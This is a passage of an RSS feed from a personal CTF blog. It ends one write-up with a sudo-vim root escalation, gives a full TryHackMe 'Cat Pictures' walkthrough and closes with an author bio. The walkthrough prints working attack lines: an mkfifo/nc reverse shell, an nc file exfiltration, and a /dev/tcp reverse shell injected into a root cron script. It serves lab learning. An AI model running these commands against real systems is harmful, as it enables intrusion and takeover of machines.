&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Linux Machine 4.15.0-58-generic &lt;span style="color:#928374;font-style:italic">#64~16.04.1-Ubuntu SMP Wed Aug 7 14:09:34 UTC 2019 i686 i686 i686 GNU/Linux&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Check for the list of privileged commands for user:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>mitch@Machine:~$ sudo -l
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>User mitch may run the following commands on Machine:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> NOPASSWD: /usr/bin/vim
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Vim for the rescue.&lt;/p>
&lt;h2 id="privilege-escalation-using-vim">Privilege Escalation Using &lt;code>vim&lt;/code>&lt;/h2>
&lt;p>Since the user does have root privilege to run &lt;code>vim&lt;/code>, we can use &lt;code>vim&lt;/code> to escalate the privilege.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>mitch@Machine:~$ sudo vim
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now inside vim enter this command:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span>:!bash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>This will spawn us the root shell.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/simple-ctf/root.webp" alt="root" style="ZgotmplZ">
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>This was a good beginner level box. I got to know &lt;code>CVE-2019-9053&lt;/code> for the first time.&lt;/p></content></item><item><title>Cat Pictures Writeup | TryHackMe</title><link>https://h4r1337.github.io/posts/cat-pictures/</link><pubDate>Thu, 07 Jul 2022 11:36:39 +0530</pubDate><guid>https://h4r1337.github.io/posts/cat-pictures/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;ul>
&lt;li>&lt;strong>Name:&lt;/strong> &lt;a href="https://tryhackme.com/room/catpictures">Cat Pictures&lt;/a>&lt;/li>
&lt;li>&lt;strong>Difficulty:&lt;/strong> Easy&lt;/li>
&lt;li>&lt;strong>Description:&lt;/strong> I made a forum where you can post cute cat pictures!&lt;/li>
&lt;/ul>
&lt;p>In this easy box, we have to use a technique called &lt;a href="https://en.wikipedia.org/wiki/Port_knocking">Port Knocking&lt;/a> to open an
anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell.
From there we will use &lt;code>mkfifo&lt;/code> to upgrade the shell. After that
we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key.
We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script
to run a revese shell, which is called by a cronjob.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;ul>
&lt;li>&lt;strong>Name:&lt;/strong> &lt;a href="https://tryhackme.com/room/catpictures">Cat Pictures&lt;/a>&lt;/li>
&lt;li>&lt;strong>Difficulty:&lt;/strong> Easy&lt;/li>
&lt;li>&lt;strong>Description:&lt;/strong> I made a forum where you can post cute cat pictures!&lt;/li>
&lt;/ul>
&lt;p>In this easy box, we have to use a technique called &lt;a href="https://en.wikipedia.org/wiki/Port_knocking">Port Knocking&lt;/a> to open an
anonymous ftp service. And then using the credentials got from the ftp server, we will get access to a very limited shell.
From there we will use &lt;code>mkfifo&lt;/code> to upgrade the shell. After that
we have to reverse a simple binary file to get the password to run that binary, which will give us a ssh private key.
We will use that to SSH into a docker instance running on the box. For reading the final root flag we will modify a script
to run a revese shell, which is called by a cronjob.&lt;/p>
&lt;h2 id="enumeration">Enumeration&lt;/h2>
&lt;p>We can start with an nmap scan:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -sC -sV -vv 10.10.85.194 -oA nmap/initial-scan
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br/>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span>Nmap scan report for 10.10.248.153
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up (0.048s latency).
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2022-07-07 12:06:05 IST for 3060s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: 65424 closed ports, 108 filtered ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ssh-hostkey:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>4420/tcp open nvm-express?
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| fingerprint-strings:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| INTERNAL SHELL SERVICE
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ctrl-c
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Please enter password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Invalid password...
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| Connection Closed
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| NULL, RPCCheck:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| INTERNAL SHELL SERVICE
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ctrl-c
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Please enter password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: GET HEAD POST OPTIONS
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-open-proxy: Potentially OPEN proxy.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_Methods supported:CONNECTION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Cat Pictures - Index page
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>As we can see 3 ports are open:&lt;/p>
&lt;ul>
&lt;li>22/tcp -&amp;gt; ssh&lt;/li>
&lt;li>4420/tcp -&amp;gt; ???&lt;/li>
&lt;li>8080/tcp -&amp;gt; http&lt;/li>
&lt;/ul>
&lt;h3 id="port-4420----internal-shell-service">Port 4420 &amp;ndash; INTERNAL SHELL SERVICE&lt;/h3>
&lt;p>From the above nmap scan we found there is an unusual port (&lt;code>4420/tcp&lt;/code>) is open. So let&amp;rsquo;s check that one first.
We can use &lt;code>nc&lt;/code> to find out what service is running on that port.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/port-4420.webp" alt="Port 4420" style="ZgotmplZ">
&lt;p>We need a password for accessing the &lt;kbd>INTERNAL SHELL SERVICE&lt;/kbd>. Leave this for later&amp;hellip;&lt;/p>
&lt;h3 id="phpbb">phpBB&lt;/h3>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/phpbb.webp" alt="phpBB" style="ZgotmplZ">
&lt;p>Port 8080 is hosting a &lt;a href="https://www.phpbb.com">phpBB forum&lt;/a>. After playing around with it a bit, I found that there is only
one user named &lt;code>user&lt;/code>.
Who is likely to be the admin. Account registration doesn&amp;rsquo;t work properly.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/auth-error.webp" alt="port fairy" style="ZgotmplZ">
&lt;p>And no other known phpBB attacks work, but account
login seems working fine -&amp;gt; password bruteforce?&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/knock-knock-hint.webp" alt="port knocking hint" style="ZgotmplZ">
&lt;p>There was only one post, which gives us a hint about port knocking. But at the time of solving I didn&amp;rsquo;t know about port
knocking and, it took me some time to realise (I mean, got help :P ).&lt;/p>
&lt;h2 id="port-knocking">Port Knocking&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/port-knocking-help.webp" alt="port fairy" style="ZgotmplZ">
&lt;p>&lt;a href="https://en.wikipedia.org/wiki/Port_knocking">Port knocking&lt;/a> was some new technique to me. It took me some time to get that,
Well thanks @pood and @FluffMe from TryHackMe discord for this hint :)
Before moving forward you must have to do some google-fu to understand what is port knocking. Here is a reference if you
want to know more about port knocking:
&lt;a href="https://sushant747.gitbooks.io/total-oscp-guide/content/port_knocking.html">port knocking&lt;/a>&lt;/p>
&lt;p>Basically port knocking is a way to hide a specific port from an attacker. We can define some rules to open a port
only if we knock some other ports in a specific order. Here knock means to send some TCP packets with SYN flag. If we knock
the ports in the same order defined by the server, the hidden port will open.&lt;/p>
&lt;p>So we have to knock on each port given in that forum and, it will open another port that was filtered or closed before.
We can do this with &lt;code>bash&lt;/code> and &lt;code>nc&lt;/code> or we can install a tool called &lt;code>knockd&lt;/code> which is available on ubuntu by default. If
not, you can download it by running:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>sudo apt-get install knockd
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The magic numbers listed in the phpBB forum are ports to knock to open a filtered port. We can knock ports by using
different methods:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># With knockd&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sudo apt-get install knockd
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>knock 10.10.85.194 &lt;span style="color:#d3869b">1111&lt;/span> &lt;span style="color:#d3869b">2222&lt;/span> &lt;span style="color:#d3869b">3333&lt;/span> &lt;span style="color:#d3869b">4444&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># With nc&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">for&lt;/span> P in &lt;span style="color:#d3869b">1111&lt;/span> &lt;span style="color:#d3869b">2222&lt;/span> &lt;span style="color:#d3869b">3333&lt;/span> 4444; &lt;span style="color:#fe8019">do&lt;/span> nc -vz 10.10.85.194 $P ;&lt;span style="color:#fe8019">done&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>After port knocking we have to port scan the target once more to view the revealed port.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -T4 10.10.85.194
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br/>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2022-07-07 15:22 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.85.194
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.51s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">997&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>21/tcp open ftp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>8080/tcp open http-proxy
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 44.51 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can see that the port 21, &lt;code>ftp&lt;/code> is open now.&lt;/p>
&lt;h2 id="ftp-discovery">FTP Discovery&lt;/h2>
&lt;p>If we found an open &lt;strong>FTP&lt;/strong> service, first things to do is to check for anonymous login. We can check this by:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>ftp anonymous@10.10.85.194
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br/>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/ftp.webp" alt="FTP anonymous login" style="ZgotmplZ">
&lt;p>Success!!! Anonymous login is enabled. There is only one file available &lt;code>note.txt&lt;/code> which probably contains the password for
the &lt;code>INTERNAL SHELL SERVICE&lt;/code>. Trust me CTFs are kinda predictable 😂.&lt;/p>
&lt;p>As I said:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span>In case I forget my password, I&amp;#39;m leaving a pointer to the internal
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>shell service on the server.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connect to port 4420, the password is *********.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>- catlover
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="initial-access----internal-shell-service">Initial Access &amp;ndash; INTERNAL SHELL SERVICE&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/got-access-to-internal-shell.webp" alt="Port 4420" style="ZgotmplZ">
&lt;p>As we now have the password, we can get inside the &lt;code>INTERNAL SHELL SERVICE&lt;/code> running on port 4420.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/port-4420-commands-available.webp" alt="Commands available" style="ZgotmplZ">
&lt;p>As you can see here we only have these binaries available in this limited shell. But most interestingly we have an
&lt;code>mkfifo&lt;/code> binary available, which we can use to upgrade our shell.&lt;/p>
&lt;p>&lt;em>&lt;strong>NOTE: You can&amp;rsquo;t go ahead without upgrading the shell.&lt;/strong>&lt;/em>&lt;/p>
&lt;p>Lets checkout &lt;a href="https://www.revshells.com">revshells.com&lt;/a> for &lt;code>mkfifo&lt;/code> and &lt;code>nc&lt;/code> reverse shell.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># your machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>nc -lvnp port
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># target machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&amp;gt;&amp;amp;1|nc your_vpn_ip port &amp;gt;/tmp/f
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br/>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/mkfifo-rev-shell.webp" alt="rev shell recieved" style="ZgotmplZ">
&lt;p>After checking out the home directory, I found out a wierd &lt;code>runme&lt;/code> located under the user &lt;strong>catlover&lt;/strong>. Tried running it
but, it also requires a password to run.&lt;/p>
&lt;p>&lt;em>&lt;strong>NOTE: As I said earlier, to run the &lt;code>runme&lt;/code> binary we need to upgrade the shell.&lt;/strong>&lt;/em>&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/regular-shell-warning.webp" alt="runme not running" style="ZgotmplZ">
&lt;p>We need to retrieve that binary to our machine to do some further investigations 🔍.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># File transfer using nc&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># On our machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>nc -lp port &amp;gt; runme
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># On target machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>nc -w &lt;span style="color:#d3869b">3&lt;/span> your-vpn-ip port &amp;lt; /home/catlover/runme
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can use the &lt;code>strings&lt;/code> command for retrieving printable characters in the binary file, and hope the password is
there.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/strings-runme.webp" alt="strings runme" style="ZgotmplZ">
&lt;p>This one looks like a password. After trying, I can confirm that is the valid password. Now we can use the password to run
the binary. This &lt;code>runme&lt;/code> binary gives us an SSH private key in the directory where the binary exists,
which we can then use to SSH into the catlover user.&lt;/p>
&lt;p>We have to retrieve the &lt;code>id_rsa&lt;/code> file we got, set the permission, and SSH into the user.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>chmod &lt;span style="color:#d3869b">600&lt;/span> id_rsa
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh catlover@catpictures.thm -i id_rsa
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br/>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/ssh-success.webp" alt="SSH success" style="ZgotmplZ">
&lt;h2 id="privilage-escalation----escape-docker">Privilage Escalation &amp;ndash; Escape Docker&lt;/h2>
&lt;p>Now that we have logged in, let&amp;rsquo;s read the first flag&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/user-flag.webp" alt="user flag" style="ZgotmplZ">
&lt;p>It shows that we are root but actually, we are not root. We are inside a docker container and we have to exit that to get
the final flag.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/docker-confirm.webp" alt="Docke confirmed" style="ZgotmplZ">
&lt;p>So how to escape the docker container and read the final flag? You will get a hint if you tried running &lt;code>history&lt;/code>.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/history.webp" alt="history output" style="ZgotmplZ">
&lt;p>There is a cron job that is running on the machine which executes the &lt;code>clean.sh&lt;/code> file. We have to inject a reverse shell
inside that file to get the actual root.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># your machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>nc -lnvp &lt;span style="color:#d3869b">9999&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Target machine&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;bash -i &amp;gt;&amp;amp; /dev/tcp/your-vpn-ip/9999 0&amp;gt;&amp;amp;1&amp;#39;&lt;/span> &amp;gt;&amp;gt; /opt/clean/clean.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now we can read the final root flag and end the machine.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/cat-pictures/root-flag.webp" alt="root flag" style="ZgotmplZ">
&lt;hr>
&lt;p>This box is a good example of why is it hard to make an easy ctf challenge :). From
this box I learned about port knocking, which I can probably use for other CTFs.&lt;/p></content></item><item><title>Whoami</title><link>https://h4r1337.github.io/whoami/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://h4r1337.github.io/whoami/</guid><description>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>h4r1337
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>h4r1337 - A self proclaimed and self taught developer / cybersecurity researcher who loves to play CTFs.&lt;/p></description><content>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>h4r1337
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>h4r1337 - A self proclaimed and self taught developer / cybersecurity researcher who loves to play CTFs.&lt;/p></content></item></channel></rss>